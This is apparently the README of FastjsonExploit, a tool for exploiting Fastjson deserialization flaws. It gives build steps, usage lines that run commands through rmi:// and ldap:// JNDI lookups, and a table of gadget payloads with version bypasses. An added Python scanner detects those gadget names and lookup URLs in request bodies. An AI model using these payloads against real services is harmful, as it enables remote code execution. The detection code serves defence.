
Description

A framework for rapid exploitation of Fastjson vulnerabilities.


FastjsonExploit | Fastjson vulnerability rapid exploitation framework

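0x01 Introduction

FastjsonExploit is a framework for rapid exploitation of Fastjson vulnerabilities. Its main features are:

  1. Generate an exploit payload with one command and start all of the exploitation environments it needs.
  2. Manage the various Fastjson payloads (the aim, of course, is to collect them all; currently 6 classes, with 11 exploits and bypasses in total).

0x02 Building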

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

0x03 Usage

FastjsonExploit is a Fastjson library vulnerability exploit framework
Author:c0ny1

Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
   Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
   Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
   Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
   Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

Available payload types:
Payload                 PayloadType  VulVersion       Dependencies
-------                 -----------  ----------       ------------
BasicDataSource1        local        1.2.2.1-1.2.2.4  tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
BasicDataSource2        local        1.2.2.1-1.2.2.4  tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
JdbcRowSetImpl1         jndi         1.2.2.1-1.2.2.4
JdbcRowSetImpl2         jndi         1.2.2.1-1.2.4.1  Fastjson 1.2.41 bypass
JdbcRowSetImpl3         jndi         1.2.2.1-1.2.4.3  Fastjson 1.2.43 bypass
JdbcRowSetImpl4         jndi         1.2.2.1-1.2.4.2  Fastjson 1.2.42 bypass
JdbcRowSetImpl5         jndi         1.2.2.1-1.2.4.7  Fastjson 1.2.47 bypass
JndiDataSourceFactory1  jndi         1.2.2.1-1.2.2.4  ibatis-core:3.0
SimpleJndiBeanFactory1  jndi         1.2.2.2-1.2.2.4  spring-context:4.3.7.RELEASE
TemplatesImpl1          local        1.2.2.1-1.2.2.4  xalan:2.7.2(need Feature.SupportNonPublicField)
TemplatesImpl2          local        1.2.2.1-1.2.2.4  xalan:2.7.2(need Feature.SupportNonPublicField)
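
A defender-side check for request bodies that name the classes in the table above or carry the `rmi://` / `ldap://` lookup URLs from the usage examples. This is an added example, not part of FastjsonExploit. It assumes Fastjson's `@type` type-hint key; `scan_body`, the finding labels and the sample bodies are constructed for illustration.

```python
import json

# Class names from the payload table above (payload name minus its numeric suffix).
GADGET_NAMES = ("BasicDataSource", "JdbcRowSetImpl", "JndiDataSourceFactory",
                "SimpleJndiBeanFactory", "TemplatesImpl")
# Lookup URL schemes that appear in the usage examples above.
JNDI_SCHEMES = ("rmi://", "ldap://")


def _strings(node, key=None):
    """Yield (key, value) for every string in the decoded tree."""
    if isinstance(node, str):
        yield key, node
    elif isinstance(node, tuple):      # one object member: (name, value)
        yield from _strings(node[1], node[0])
    elif isinstance(node, list):       # an array, or the member list of an object
        for item in node:
            yield from _strings(item, key)


def scan_body(body):
    """Return sorted findings for one JSON request body (empty list = clean)."""
    try:
        # object_pairs_hook=list keeps duplicate keys, which a dict would drop;
        # json.loads also decodes \uXXXX escapes before any matching happens.
        doc = json.loads(body, object_pairs_hook=list)
    except (TypeError, ValueError):
        # Fastjson parses more leniently than strict JSON, so a body rejected
        # here is surfaced for review instead of being treated as clean.
        return ["unparseable-json"]
    findings = set()
    for key, value in _strings(doc):
        if key == "@type":
            hit = next((g for g in GADGET_NAMES if g in value), None)
            findings.add(f"gadget-type:{hit}" if hit else "autotype-present")
        if value.strip().lower().startswith(JNDI_SCHEMES):
            findings.add(f"jndi-url:{key}")
    return sorted(findings)


# Constructed sample bodies; package and field names are placeholders.
SAMPLES = [
    '{"user": "alice", "homepage": "https://example.com"}',
    r'{"data": {"\u0040type": "pkg.placeholder.JdbcRowSetImpl", "ref": "ldap://127.0.0.1:1232/Exploit"}}',
    '{"@type": "pkg.placeholder.TemplatesImpl", "@type": "java.lang.String"}',
    "{'@type': 'pkg.placeholder.BasicDataSource'}",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan_body(sample), "<-", sample)
```

Substring matching on the class name is deliberate: it still fires when the fully qualified name is wrapped or prefixed, which an exact-match denylist would miss.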

0x04 Notice

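  • The Fastjson versions that the help output lists as exploitable for each payload are not necessarily correct. They will be corrected after further testing!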

0x05 Reference

  • https://github.com/frohoff/ysoserial
  • https://github.com/mbechler/marshalsec
  • https://github.com/kxcode/JNDI-Exploit-Bypass-Demo
